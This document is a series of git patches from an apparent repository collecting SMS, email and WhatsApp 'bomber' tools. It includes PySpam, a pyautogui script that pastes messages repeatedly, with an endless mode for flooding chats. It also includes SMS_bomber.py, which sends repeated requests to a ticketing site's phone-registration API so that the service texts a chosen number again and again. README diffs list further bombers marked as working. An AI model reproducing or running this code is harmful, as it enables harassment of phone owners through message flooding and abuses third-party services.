+print(Fore.YELLOW + "[" + Fore.CYAN + "5" + Fore.YELLOW + "]exit") +name = input('>>> ') # name: 1, 2 or 3(int) +st = 0 +if name == '1': + f = input("file name: ") #f - filename(str) + print(Fore.GREEN + 'num of messages(you can use"all"): ' + Fore.RED) + + sta = input() # sta - num of messages(int or str('all')) + if sta == 'all': + num = 0 # num - index of file(int) + fil = f + ".txt" # file.txt + try: # errorfind + file = open(fil, 'r', encoding = 'utf-8').readlines() # open file for 'all' + except: + error(1, uns) + filew = file + elif sta != 'all': + + try: # errorfind + sta = int(sta) # sta - num of messages(int or str('all')) + except: + error(2, sta) + num = 0 + fil = f + ".txt" + try: # errorfind + file = open(fil, 'r', encoding = 'utf-8').readlines() #open file for 'slice' + + except: + error(1, uns) + if sta > len(file): + error(3, uns) + filew = file[:sta] #slice of file + + sleep(4) # wait... + system('cls||clear') # cls + + print(Fore.YELLOW + b +"\nwait. ") + sleep(0.5) + system('cls||clear') + + print(Fore.YELLOW + b +"\nwait.. ") + sleep(0.5) + system('cls||clear') + + print(Fore.YELLOW + b +"\nwait...") + system('cls||clear') + for a in filew: # spam messages in file + print(Fore.GREEN + '%1d message send!' %(num + 1)) # print messages in screen + pyautogui.write(a) + num = num + 1 + + print('=====process=====') + print(b, '\ntimes: %1s' %(len(filew))) + pyautogui.alert('succefuly send %2d messages!' %(len(filew))) # result +elif name == '2': + print(Fore.RED + b) + print(Fore.GREEN + 'text: ' + Fore.RED) + g = input() + print(Fore.GREEN + 'num of messages: ' + Fore.RED) + + try: # errorfind + n = int(input()) + except: + error(2, n) + sleep(4) # wait... + f = range(n) + system('cls||clear') # cls + + print(Fore.YELLOW + b +"\nwait. ") + sleep(0.5) + system('cls||clear') + + print(Fore.YELLOW + b +"\nwait.. ") + sleep(0.5) + system('cls||clear') + + print(Fore.YELLOW + b +"\nwait...") + system('cls||clear') + + print('=====process=====') + print(b, '\nmessage: %1s\ntimes: %1s' %(g, n)) + for i in f: # spam messages + print(Fore.GREEN + '%1d message send!' %(i + 1)) # print messages in screen + pyautogui.write(g) + pyautogui.press('enter') + + pyautogui.alert('succefuly send %2d messages!' %(n)) # result +elif name == '3': # credits + print(cr) + input() + +elif name == '4': # errorlist + print(err) + input() + +elif name == '5': + exit() + +else: + error(4, name) From 0863abad4983162e0ce065d4365676c4420335c6 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Mon, 28 Dec 2020 09:57:43 +0530 Subject: [PATCH 14/58] Update README.md --- README.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/README.md b/README.md index 5b847bb..366af6c 100644 --- a/README.md +++ b/README.md @@ -79,6 +79,9 @@ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 3. bomberthon -> Best Bombing Tool with WhatsApp, Instagram, SMS bomber - by [b31ngD3v](https://github.com/b31ngD3v) +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 4. PySpam -> Spam for pc {not work ok phone} - by [timofey260](https://github.com/timofey260) + + ## Contributors: To keep this collection up-to-date need contributors who can add more mobile/email/whatsapp/twitter scripts and github repo here at one place. @@ -91,6 +94,7 @@ To keep this collection up-to-date need contributors who can add more mobile/ema :octocat: [LucasNcipha](https://github.com/LucasNcipha)
:octocat: [akshaykalucha3](https://github.com/akshaykalucha3)
:octocat: [xyzricky](https://github.com/xyzricky)
+:octocat: [timofey260](https://github.com/timofey260)
## Note: From 598e80e2f739811a21ff5d043f2d0634b4cd92b7 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Mon, 28 Dec 2020 10:02:23 +0530 Subject: [PATCH 15/58] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 366af6c..952d2e9 100644 --- a/README.md +++ b/README.md @@ -55,6 +55,8 @@ ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 7. Email-Spammer -> Email Bomber. - by Juniorn1003 +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 8. Email-Bomber -> Email Bomber. - by mohinparamasivam + ### Whats-app Bombers :calling: :boom: ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. wbomb.py -> Whatsapp-bomber sending multipal message to a single user From f8599d917224222596727a73fd16c9cccf377e70 Mon Sep 17 00:00:00 2001 From: timofey <69044246+timofey260@users.noreply.github.com> Date: Thu, 31 Dec 2020 19:17:39 +0300 Subject: [PATCH 16/58] Update spam.py --- spam.py | 405 +++++++++++++++++++++++++++++++++++++------------------- 1 file changed, 268 insertions(+), 137 deletions(-) diff --git a/spam.py b/spam.py index 26dfb83..663242a 100644 --- a/spam.py +++ b/spam.py @@ -1,154 +1,285 @@ -#pip install pyautogui -#please download last version on github -#don't work on mobile' +# Discord: TiMoFey#5066 +# Github: https://github.com/timofey260/pyspam +# site: https://timofey26s.tilda.ws +# import______________________________________________ +import codecs import pyautogui -from time import sleep # sleep block on load{wait...} -from colorama import Fore, init # for colored text -from os import system # system use for clear messages -init(Fore) # colorama init -uns = '' #unuse str. uses for def error() -cr = (' ____________________________________________ \n' - '|-----------------Made by Timofey------------|\n' - '|Discord: TiMoFey#5066 |\n' - '|Github: https://github.com/timofey260/pyspam|\n' - '|site: https://timofey26s.tilda.ws |\n' - '|____________________________________________|\n') +from os import system # system use for clear messages +from time import sleep # sleep block on load{wait...} +from colorama import Fore, init # for colored text -err = ( ' _________________________________________________________ \n' - '|---------------------------Errors------------------------|\n' - '|1. FileError: file not found! |\n' - '|2. NumError: {str} not a number! |\n' - '|3. IndexError: index out of range! |\n' - '|4. TypeError: {str} is not 1,2 or 3! |\n' - '|5. ListError: Error not found! correct def error() |\n' - '|_________________________________________________________|\n') -b = ('_____ + \n' - ' | /\\ /\\ \n' - ' | | / \\ / \\ \n' - ' | | / \\ / \\ \n' - ' | | / \\/ \\ \n' - '========spam_programm======= \n') # menu -print(Fore.RED + b) -def error(num, result): # errors: easy moding - if num == 1: - print('FileError: file not found!') - input() - elif num == 2: - print('NumError: %1s not a number!' %(result)) - input() - elif num == 3: - print('IndexError: index out of range!') - input() - elif num == 4: - print('TypeError: %1s is not 1,2 or 3!' %(result)) - input() - else: - print('ErrorError: Error not found! correct def error()') - input() - exit() +# inits________________________________________________ +init(Fore) # colorama init +uns = '' # unuse str. uses for def error() +# colors_______________________________________________ +rr = Fore.RED +rg = Fore.GREEN +rc = Fore.CYAN +ry = Fore.YELLOW +# vars_______________________________________ +x = 6 +modes = 3 +v = "1.2.5" +run = True +# banners____________________________________________ +log = ('1.2.5:\n' + '-interval added\n') +b = ('_____ + |||||||||||||||||| \n' + ' | /\\ /\\ |||||(0)|||(0)|||| \n' + ' | | / \\ / \\ |||||||||||||||||| \n' + ' | | / \\ / \\ ||||0\\|||||||/0||| \n' + ' | | / \\/ \\ ||||\\00000000/|||| \n' + '========spam_programm===========|||||||||||||||||| \n') # menu +cr = (rg + ' ________________________________________________ \n' + '|-------------------Made by Timofey--------------|\n' + '|Discord: TiMoFey#5066 |\n' + '|Github: https://github.com/timofey260/pyspam |\n' + '|site: https://timofey26s.tilda.ws |\n' + '|________________________________________________|\n') +err = (rr + ' _________________________________________________________ \n' + '|---------------------------Errors------------------------|\n' + '|1. FileError: file not found! |\n' + '|2. NumError: {str} not a number! |\n' + '|3. IndexError: index out of range! |\n' + '|4. TypeError: {str} is not 1 - %1s! |\n' + '|5. ListError: Error not found! correct def error() |\n' + '|_________________________________________________________|\n' % (x)) -print(Fore.YELLOW + "[" + Fore.CYAN + "1" + Fore.YELLOW + "]file") #menu buttons -print(Fore.YELLOW + "[" + Fore.CYAN + "2" + Fore.YELLOW + "]message") -print(Fore.YELLOW + "[" + Fore.CYAN + "3" + Fore.YELLOW + "]credits") -print(Fore.YELLOW + "[" + Fore.CYAN + "4" + Fore.YELLOW + "]Errorlist") -print(Fore.YELLOW + "[" + Fore.CYAN + "5" + Fore.YELLOW + "]exit") -name = input('>>> ') # name: 1, 2 or 3(int) -st = 0 -if name == '1': - f = input("file name: ") #f - filename(str) - print(Fore.GREEN + 'num of messages(you can use"all"): ' + Fore.RED) - - sta = input() # sta - num of messages(int or str('all')) - if sta == 'all': - num = 0 # num - index of file(int) - fil = f + ".txt" # file.txt - try: # errorfind - file = open(fil, 'r', encoding = 'utf-8').readlines() # open file for 'all' - except: - error(1, uns) - filew = file - elif sta != 'all': - - try: # errorfind - sta = int(sta) # sta - num of messages(int or str('all')) - except: - error(2, sta) - num = 0 - fil = f + ".txt" - try: # errorfind - file = open(fil, 'r', encoding = 'utf-8').readlines() #open file for 'slice' - - except: - error(1, uns) - if sta > len(file): - error(3, uns) - filew = file[:sta] #slice of file - - sleep(4) # wait... - system('cls||clear') # cls +# deffs___________________________________________ +def error(value, result, ver): # errors: easy moding + if value == 1: + print('FileError: %1s file not found!' % result) - print(Fore.YELLOW + b +"\nwait. ") - sleep(0.5) - system('cls||clear') + elif value == 2: + print('NumError: %1s not a number!' % result) - print(Fore.YELLOW + b +"\nwait.. ") - sleep(0.5) - system('cls||clear') + elif value == 3: + print('IndexError: index out of range!') - print(Fore.YELLOW + b +"\nwait...") - system('cls||clear') - for a in filew: # spam messages in file - print(Fore.GREEN + '%1d message send!' %(num + 1)) # print messages in screen - pyautogui.write(a) - num = num + 1 + elif value == 4: + print('TypeError: %1s is not 1 - %1s!' % (result, ver)) - print('=====process=====') - print(b, '\ntimes: %1s' %(len(filew))) - pyautogui.alert('succefuly send %2d messages!' %(len(filew))) # result -elif name == '2': - print(Fore.RED + b) - print(Fore.GREEN + 'text: ' + Fore.RED) - g = input() - print(Fore.GREEN + 'num of messages: ' + Fore.RED) + else: + print('ListError: Error not found! correct def error()') + input() + exit() - try: # errorfind - n = int(input()) - except: - error(2, n) - sleep(4) # wait... - f = range(n) - system('cls||clear') # cls +def menud(pa1, pa2): + print(ry + "[" + rc + str(pa1) + ry + "] " + pa2) - print(Fore.YELLOW + b +"\nwait. ") - sleep(0.5) - system('cls||clear') - print(Fore.YELLOW + b +"\nwait.. ") - sleep(0.5) - system('cls||clear') +def menu(): + print(rr + b) + menud(1, 'mode') # menu text + menud(2, 'credits') + menud(3, 'Errorlist') + menud(4, 'exit') + menud(5, 'version') + menud(6, 'log') +import pyperclip, keyboard - print(Fore.YELLOW + b +"\nwait...") - system('cls||clear') +def paste(text): + pyperclip.copy(text) + keyboard.press_and_release('ctrl + v') - print('=====process=====') - print(b, '\nmessage: %1s\ntimes: %1s' %(g, n)) - for i in f: # spam messages - print(Fore.GREEN + '%1d message send!' %(i + 1)) # print messages in screen - pyautogui.write(g) - pyautogui.press('enter') - pyautogui.alert('succefuly send %2d messages!' %(n)) # result -elif name == '3': # credits - print(cr) - input() +# programms__________________________________________________ +while run: -elif name == '4': # errorlist - print(err) - input() + menu() + name = input('>>> ') # name(int) + if name == '1': + menud(1, 'file') # menu text + menud(2, 'message') + menud(3, 'num_message') + name = input('>>> ') + if name == '1': -elif name == '5': - exit() + f = input("file name: ") # f - filename(str) + print(rg + 'num of messages(you can use"all"): ' + rr) -else: - error(4, name) + n = input() # n - num of messages(int or str('all')) + try: + inte = int(input("interval[sec]: ")) + + except: + error(2, inte, ver) + if n == 'all': + num = 0 # num - index of file(int) + fil = f + ".txt" # file.txt + try: # errorfind + file = codecs.open(fil, 'r', encoding='utf-8').readlines() # open file for 'all' + except: + error(1, fil, x) + filew = file + le = len(filew) + elif n != 'all': + + try: # errorfind + n = int(n) # n - num of messages(int or str('all')) + except: + error(2, n, x) + num = 0 + fil = f + ".txt" + try: # errorfind + file = codecs.open(fil, 'r', encoding='utf-8').readlines() # open file for 'slice' + filew = file[:n] # slice of file + except: + error(1, fil, x) + le = len(filew) + if n > len(filew): + error(3, uns, x) + + elif n == "": + error(2, n, x) + sleep(4) # wait... + system('cls||clear') # cls + + print(ry + b + "\nwait. ") + sleep(0.5) + system('cls||clear') + + print(ry + b + "\nwait.. ") + sleep(0.5) + system('cls||clear') + + print(ry + b + "\nwait...") + system('cls||clear') + for a in filew: # spam messages in file + sleep(inte) + print(rg + '%1d message send!' % (num + 1)) # print messages in screen + paste(a) + num = num + 1 + pyautogui.press('enter') + print('=====process=====#file') + pyautogui.alert('succefuly send %2d messages!' % (le)) # result + elif name == '2': + print(rr + b) + print(rg + 'text: ' + rr) + g = input() + print(rg + 'num of messages(0 = inf.): ' + rr) + try: + inte = int(input("interval[sec]: ")) + + except: + error(2, inte, ver) + try: # errorfind + n = int(input()) + except: + + error(2, n, x) + sleep(4) # wait... + f = range(n) + system('cls||clear') # cls + + print(ry + b + "\nwait. ") + sleep(0.5) + system('cls||clear') + + print(ry + b + "\nwait.. ") + sleep(0.5) + system('cls||clear') + + print(ry + b + "\nwait...") + system('cls||clear') + + print('=====process=====#message') + print(b, '\nmessage: %1s\ntimes: %1s' % (g, n)) + if n != 0: + for i in f: # spam messages + sleep(inte) + print(rg + '%1d message send!' % (i + 1)) # print messages in screen + paste(g) + pyautogui.press('enter') + elif n == 0: + r = True + i = 0 + while r: + i = i + 1 + sleep(inte) + print(rg + '%1d message send!' % (i)) + paste(g) + pyautogui.press('enter') + + pyautogui.alert('succefuly send %2d messages!' % n) # result + elif name == '3': + print(rr + b) + print(rg + 'prefix: ' + rr) + g = str(input()) + + print(rg + 'suffix: ' + rr) + su = str(input()) + print(rg + 'num of messages(0 = inf.): ' + rr) + try: + inte = int(input("interval[sec]: ")) + + except: + error(2, inte, ver) + try: # errorfind + n = input() + n = int(n) + except: + + error(2, n, x) + sleep(4) # wait... + f = range(n) + system('cls||clear') # cls + + print(ry + b + "\nwait. ") + sleep(0.5) + system('cls||clear') + + print(ry + b + "\nwait.. ") + sleep(0.5) + system('cls||clear') + + print(ry + b + "\nwait...") + system('cls||clear') + + print('=====process=====num_message') + print(b, '\nprefix: %1s\nsuffix %1s\ntimes: %1s' % (g, su, n)) + if n != 0: + for i in f: # spam messages + sleep(inte) + print(rg + '%1d message send!' % (i + 1)) # print messages in screen + fo = ('%1s %1s %1s' %(g, str(i), su)) + paste(g) + pyautogui.press('enter') + i = i + 1 + elif n == 0: + r = True + i = 0 + while r: + sleep(inte) + i = i + 1 + print(rg + '%1d message send!' % (i)) + fo =('%1s %1s %1s' %(g, str(i), su)) + paste(g) + pyautogui.press('enter') + + else: + error(4, name, modes) + elif name == '2': # credits + system('cls||clear') # cls + print(cr) + input() + + elif name == '3': # errorlist + system('cls||clear') # cls + print(err) + input() + + elif name == '4': # exit + run = False + + elif name == '5': # exit + system('cls||clear') # cls + print(v) + input() + elif name == '6': # exit + system('cls||clear') # cls + print(log) + input() + else: + error(4, name, x) From 1097274f96f7d74df8b2e22fc3366a6efcfc8b2a Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Mon, 18 Jan 2021 22:12:28 +0530 Subject: [PATCH 17/58] Update README.md --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 952d2e9..f5c4bcf 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,5 @@ # :boom::bomb::bomb::bomb: BOMBERs :bomb::bomb::bomb::boom: -𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡/Twitter 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ +𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡/Twitter/Instagram 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) : Working
![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) : Not- Working (Or need some modifications)
@@ -83,6 +83,8 @@ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 4. PySpam -> Spam for pc {not work ok phone} - by [timofey260](https://github.com/timofey260) +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 5. bomberthon -> Best Bombing Tool with WhatsApp, Instagram, SMS bomber - by [el-pr0f3ss0r](https://github.com/el-pr0f3ss0r) + ## Contributors: From c5e829543e9d18afff27fa2506d2c7e75aba8683 Mon Sep 17 00:00:00 2001 From: juzeon <812312770@qq.com> Date: Sat, 30 Jan 2021 13:52:08 +0800 Subject: [PATCH 18/58] add fast-mail-bomber --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index f5c4bcf..5ef440e 100644 --- a/README.md +++ b/README.md @@ -57,6 +57,8 @@ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 8. Email-Bomber -> Email Bomber. - by mohinparamasivam +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 9. Fast Mail Bomber -> Fast, multithreading, efficient and easy-to-use mail bombing/spamming tool. Sending mails via mailman services hosted by different providers. - by juzeon + ### Whats-app Bombers :calling: :boom: ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. wbomb.py -> Whatsapp-bomber sending multipal message to a single user From 66c1b4cc434693c4c46a8513be25dfdc166d343f Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Sat, 30 Jan 2021 17:55:14 +0530 Subject: [PATCH 19/58] Update README.md --- README.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/README.md b/README.md index 5ef440e..63d2c01 100644 --- a/README.md +++ b/README.md @@ -85,8 +85,6 @@ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 4. PySpam -> Spam for pc {not work ok phone} - by [timofey260](https://github.com/timofey260) -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 5. bomberthon -> Best Bombing Tool with WhatsApp, Instagram, SMS bomber - by [el-pr0f3ss0r](https://github.com/el-pr0f3ss0r) - ## Contributors: From e7a272bd069591eb70555758b5107b1fbd50a3bb Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Sat, 30 Jan 2021 17:56:27 +0530 Subject: [PATCH 20/58] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 63d2c01..778b0a1 100644 --- a/README.md +++ b/README.md @@ -99,6 +99,7 @@ To keep this collection up-to-date need contributors who can add more mobile/ema :octocat: [akshaykalucha3](https://github.com/akshaykalucha3)
:octocat: [xyzricky](https://github.com/xyzricky)
:octocat: [timofey260](https://github.com/timofey260)
+:octocat: [juzeon](https://github.com/juzeon)
## Note: From e4f00e272bb10746d496c9b0254814b7f3156833 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Wed, 24 Feb 2021 10:06:57 +0530 Subject: [PATCH 21/58] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 778b0a1..b0797de 100644 --- a/README.md +++ b/README.md @@ -39,6 +39,8 @@ ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 15. YetAnotherSMSBomber -> Sms Bomber. - by AvinashReddy3108 +![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 16. smsbomb -> Sms Bomber. - by 1d8 + ### EMAIL BOMBERS :e-mail: :boom: ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Email_bomber.py -> sending continues email. Update with Outlook bomber as well - by [xyzricky](https://github.com/xyzricky) From 008406613157ad87e22ca5d6d4e9340703a24a14 Mon Sep 17 00:00:00 2001 From: jtmultimedia <80318016+jtmultimedia@users.noreply.github.com> Date: Tue, 9 Mar 2021 15:10:18 +0600 Subject: [PATCH 22/58] hi Hi --- SMS_bomber.py | 52 +++++++++++++++++++++++++-------------------------- 1 file changed, 25 insertions(+), 27 deletions(-) diff --git a/SMS_bomber.py b/SMS_bomber.py index 403b772..c9e08dc 100644 --- a/SMS_bomber.py +++ b/SMS_bomber.py @@ -1,9 +1,15 @@ -from urllib.request import Request,urlopen -from urllib.parse import urlencode +#python2 +#from urllib.request import Request,urlopen +import urllib2,cookielib +#from urllib.parse import urlencode import platform import os import time -from random import randint + +try: + raw_input +except NameError: + raw_input = input def banner(): if platform.system().lower()=="windows": @@ -11,7 +17,6 @@ def banner(): else: os.system("clear") print(""" - /$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$$ /$$$$$$$ /$$$$$$$$ /$$$$$$$ /$$__ $$| $$$ /$$$ /$$__ $$ | $$__ $$ /$$__ $$| $$$ /$$$| $$__ $$| $$_____/| $$__ $$ | $$ \__/| $$$$ /$$$$| $$ \__/ | $$ \ $$| $$ \ $$| $$$$ /$$$$| $$ \ $$| $$ | $$ \ $$ @@ -21,44 +26,37 @@ def banner(): | $$$$$$/| $$ \/ | $$| $$$$$$/ | $$$$$$$/| $$$$$$/| $$ \/ | $$| $$$$$$$/| $$$$$$$$| $$ | $$ \______/ |__/ |__/ \______/ |_______/ \______/ |__/ |__/|_______/ |________/|__/ |__/ - By : D3XBugg3R - Modded By: Lucas - With <3 of T34M GCA + By : D3XBugg3R Note : I won't be responsible for any damage caused by this script, Use at your own risk """) -#http://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile= #https://securedapi.confirmtkt.com/api/platform/register?mobileNumber= #http://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile= -#http://www.quikr.com/SignIn?aj=1&for=send_otp&user= - #https://securedapi.confirmtkt.com/api/platform/register?mobileNumber= - -how_many = input("How many numbers do you want to bomb? ") -numbers = [] -for i in range(how_many): - temp = str(input(f"Enter the number {i+1}: ")) - numbers.append(temp) - def send(num, counter, slep): #url = ["https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=","https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=","https://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile="] - url="https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=" - data={"phone":num} + url="https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + #data={"phone":num} + hdr = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3','Accept-Encoding': 'none','Accept-Language': 'en-US,en;q=0.8','Connection': 'keep-alive'} + result_url=url+num + req = urllib2.Request(result_url, headers=hdr) for x in range(counter): banner() - print("Target Number : ", num) - print("Number of Message Sent : ", x+1) - result_url=url+num - resp1=Request(result_url) - urlopen(resp1) + #print("Target Number : 01531999473", num) + #print("Number of Message Sent : ", x+1) + page = urllib2.urlopen(req) + #resp1=Request(result_url) + #urlopen(resp1) time.sleep(slep) try: banner() - for number in numbers: - send(number, int(input(f"Enter Number of Messages for {number} : ")), randint(3)) + number = raw_input("Enter mobileNumber: ") + count = raw_input("Enter number of Message: ") + throttle = raw_input("Enter time of sleep: ") + send(number,int(count), int(throttle)) except Exception as e: - print("Something is wrong please Run again this script.") + print("Something is wrong please Re-run this script.") From bc84ebcb462926dc4c20d61b09148d0c1fcd8d0d Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Wed, 10 Mar 2021 10:13:35 +0530 Subject: [PATCH 23/58] Update README.md --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b0797de..08c0d00 100644 --- a/README.md +++ b/README.md @@ -8,8 +8,8 @@ ### SMS BOMBERS :calling: :boom: -![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. - NOTE: Sms_bomber.py not working anymore, please refer: Sms_bomber_updated.py +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. + NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). You also refer: Sms_bomber_updated.py ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 2. Sms_bomber_version2.py -> sending continues sms from using one Multiple links. @@ -102,6 +102,7 @@ To keep this collection up-to-date need contributors who can add more mobile/ema :octocat: [xyzricky](https://github.com/xyzricky)
:octocat: [timofey260](https://github.com/timofey260)
:octocat: [juzeon](https://github.com/juzeon)
+:octocat: [Ghost](https://github.com/ghost) ## Note: From be9cb1318bb6b5f4cac2f1609f023f55744041fa Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Wed, 10 Mar 2021 10:16:10 +0530 Subject: [PATCH 24/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 08c0d00..22f1be0 100644 --- a/README.md +++ b/README.md @@ -8,7 +8,7 @@ ### SMS BOMBERS :calling: :boom: -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. +![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). You also refer: Sms_bomber_updated.py ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 2. Sms_bomber_version2.py -> sending continues sms from using one Multiple links. From b2dfdd4433336118f5ca547d43d011dbbe9825c0 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Wed, 10 Mar 2021 10:16:42 +0530 Subject: [PATCH 25/58] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 22f1be0..dda2355 100644 --- a/README.md +++ b/README.md @@ -9,7 +9,7 @@ ### SMS BOMBERS :calling: :boom: ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Sms_bomber.py -> sending continues sms from using one single link. - NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). You also refer: Sms_bomber_updated.py + NOTE: Sms_bomber.py is now working too Thanks to [Ghost](https://github.com/ghost). Also refer: Sms_bomber_updated.py ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 2. Sms_bomber_version2.py -> sending continues sms from using one Multiple links. From efb381604a90e7b09306374222554c066be5b7ba Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Wed, 7 Apr 2021 10:01:15 +0530 Subject: [PATCH 26/58] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index dda2355..fa1c312 100644 --- a/README.md +++ b/README.md @@ -41,6 +41,8 @@ ![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 16. smsbomb -> Sms Bomber. - by 1d8 +![Others](https://placehold.it/15/00FF00/00FF00/?text=+) 17. XLR8_BOMBER -> Superfast SMS bomber for linux and termux. - by anubhavanonymous + ### EMAIL BOMBERS :e-mail: :boom: ![Working](https://placehold.it/15/0000FF/0000FF/?text=+) 1. Email_bomber.py -> sending continues email. Update with Outlook bomber as well - by [xyzricky](https://github.com/xyzricky) From a72b4c3c20f23d0fd406a32ca718ba68e3827de2 Mon Sep 17 00:00:00 2001 From: "Sameer Bhatt (debugger)" <22076778+bhattsameer@users.noreply.github.com> Date: Wed, 7 Apr 2021 10:09:40 +0530 Subject: [PATCH 27/58] Update README.md Update color codes as previous code are not working any more. --- README.md | 78 +++++++++++++++++++++++++++---------------------------- 1 file changed, 39 insertions(+), 39 deletions(-) diff --git a/README.md b/README.md index fa1c312..203f0ca 100644 --- a/README.md +++ b/README.md @@ -1,93 +1,93 @@ # :boom::bomb::bomb::bomb: BOMBERs :bomb::bomb::bomb::boom: 𝕊𝕄𝕊/𝔼𝕞𝕒𝕚𝕝/𝕨𝕙𝕒𝕥𝕤𝕒𝕡𝕡/Twitter/Instagram 𝔹𝕠𝕞𝕓𝕖𝕣𝕤 ℂ𝕠𝕝𝕝𝕖𝕔𝕥𝕚𝕠𝕟. ♡ -![Working](https://placehold.it/15/0000FF/0000FF/?text=+) : Working
-![Not-Working](https://placehold.it/15/FF0000/FF0000/?text=+) : Not- Working (Or need some modifications)
-![Others](https://placehold.it/15/00FF00/00FF00/?text=+) : Others (pending, Some anothers issues OR not checked that is it working or not.)
+![Working](https://via.placeholder.com/15/c5f015/000000?text=+) : Working
+![Not-Working](https://via.placeholder.com/15/f03c15/000000?text=+) : Not- Working (Or need some modifications)
+![Others](https://via.placeholder.com/15/1589F0/000000?text=+) : Others (pending, Some anothers issues OR not checked that is it working or not.)
